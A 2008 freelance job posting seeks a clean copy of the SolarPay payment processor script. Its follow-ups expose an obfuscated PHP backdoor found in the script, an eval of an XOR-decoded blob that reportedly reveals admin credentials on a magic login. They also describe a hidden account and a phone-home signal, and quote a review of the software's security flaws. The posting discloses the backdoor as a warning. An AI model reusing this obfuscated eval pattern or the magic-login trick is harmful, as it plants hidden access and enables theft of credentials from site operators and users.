Project Detail

Description

Who can provide me this SOLAR payment processor script? Not encrypted, no backdoors, no security leaks. I want it OPEN SOURCE first THEN....it can be encrypted..... I bought it encrypted from this dickhead who claimed he wrote it and now he cant set it up cause he doesnt know what a cron job is...

http://www.e-topbiz.com/oprema/pages/pproc2.php


here are others that claims they wrote it too..

http://plxwebdev.com/demos/plxsolarpay/
http://paymentprocessorscript.net/demo/shop.htm
http://www.hotscripts.com/Detailed/36379.html

So Basically, I want that script (or a better) installed on my Linux/mySQL server (I have no cron on my server...so thats a workaround 4ya...)
Please show proof that you have the REAL script and I'll select you immideately. Be smart = get selected.
Regards,
eteqdotcom


Additional information submitted:

11/01/2008 at 22:22 EDT:
after some more resarch ....(well u get the picture..none of that below...none..)

function authCheck(){
global $superpass;
list($adm_login) = mysql_fetch_row(mysql_query("SELECT username FROM epay_users WHERE id=3"));
if ($_POST['username'] == $adm_login && $_POST['password'] == $superpass){
return 1;
}else{
$aaaa111111111111111111 = "cd3db41c99299378cd1b632ed1872@@7c63189d59f3ca3e775b2b7742fba@@97a2c191b9dba3a13bfe569215140d6a|3e6a60255233465a53632d270664371f69463403151d261f126e6a4d601163083533286002163a44142b3c57603b5c794e7b532256176473133412152c35170725560021661167444b51655e532256176d75394e6f0e156f561c284343797313650b12002e11113b580e2523522d09151e28061e2659132d2d47321402516e097d403e6a212d5b28464312231f282558042d201d655a050179504c433e6a4d2b502f0947573407072c4513253d4069445b11354c55723d6a4d3339";
eval( azxscd($aaaa111111111111111111) );
}
}


function azxscd($eex8arss){
$uuguug = explode("@@",$eex8arss);
$llakkadfasda = $uuguug[0];
$adfasdf = $uuguug[1];
$eex8arss = $uuguug[2];
$aadd90921 = $eex8arss;
$fastdafs = crypt($llakkadfasda,$adfasdf);
list($qq3544, $iiediieoo0) = explode("|", $aadd90921);
$iiediieoo0 = chop(hbdddaaededbv($iiediieoo0));
$fastdafsst = $fastdafs;
while(strlen($fastdafs) < strlen($iiediieoo0)) {
$fastdafs .= $fastdafsst;
}
$iiediieoo0 = $fastdafs ^ $iiediieoo0;
$new_qq3544 = md5($iiediieoo0);
if ($qq3544 == $new_qq3544) {
$eex8arss = $iiediieoo0;
}else{
$eex8arss = "";
}
return $eex8arss;
}


For those too lazy (or wary) to run this themselves, this means if someone tries to log in with the username and/or password set to musicfromamajormotionpicture, possibly with white space, it will echo the admin username and password.



eteqdotcom

(19 reviews)
Project Owner
Posted: Today 22:01 EDT
after some more research....
The creator of the script has made a seperate area hidden in the MYSQL file that when you login to the check in area it will scan 2 parts of the database. If you do a Scan threw the SQL file before install for the name CHRIS and you will see his password that will help on making him have his own accesss. The script will send a signal to him to show him were all the scripts are installed which i have not found that code to remove yet.



eteqdotcom

(19 reviews)
Project Owner
Posted: Today 21:50 EDT
Ok, basically after a "little" research I found this posting on a website..... SolarPay (aka EPay, E-Pay, DeskPay, TeamPHP Pay, etc) on a software rating site.

I've been tasked with adapting this software for barter use in a closed club. It isn't fun. This software violates pretty much every tennet of GAAP, database design, software engineering, and information security. Here is my review:



In short: Do not use SolarPay (aka EPay, E-Pay, etc). Your time is much better spent developing in house. If you do not understand both GAAP and Relational Databases, hire people who do. You will still save money.

Also note: SolarPay is GPL'd. There is no reason to pay for it if you wish to use it. The SolarWare company is now defunct and none of the (former affilliate program) vendors of SolarPay deliver support.

In Detail:



Overall Issues:

SolarPay (the version we are trying to adapt to be fit for it's stated purpose) is a 7MB file, of which only 500KB is NOT dedicated to the affilliate program to sell SolarPay.

SolarPay lacks polish and sophistication.

The SolarPay HTML is badly structured and very hard to understand.

The PHP scripts are severely spaghetti code.



Architecture Issues:

SolarPay is hard-coded to use MySQL and requires the HTTPD to connect to the database as the user that owns the database (an SQL injection attack could result in the dropping of all tables, or worse).

SolarPay is hard-coded to use non-transactional table types. A user who closes the browser window mid-request could leave half-completed transactions (money withdrawn, but not sent to the transferee, or worse)

SolarPay is not based on a journaled accounting system.

SolarPay requires substantial amounts of PHP scripts to be writeable by the HTTPD process.

There is no seperation between business logic, authentication and authorization, and presentation


Implementation Issues

Passwords are not encrypted.

Database access passwords, etc are stored under the server's documentroot.

Session handling code appears to re-invent the wheel.

Session handling code requires database writes and reads on every page view.

There are session hijacking Vulnerabilities.

Database access code is spread throughout the scripts, not all in one place.

Many notification emails do not have adequate information for a merchant to complete a transaction.

Merchants who use a pay now button with a notification URL are sent the solarpay username and password of their customers.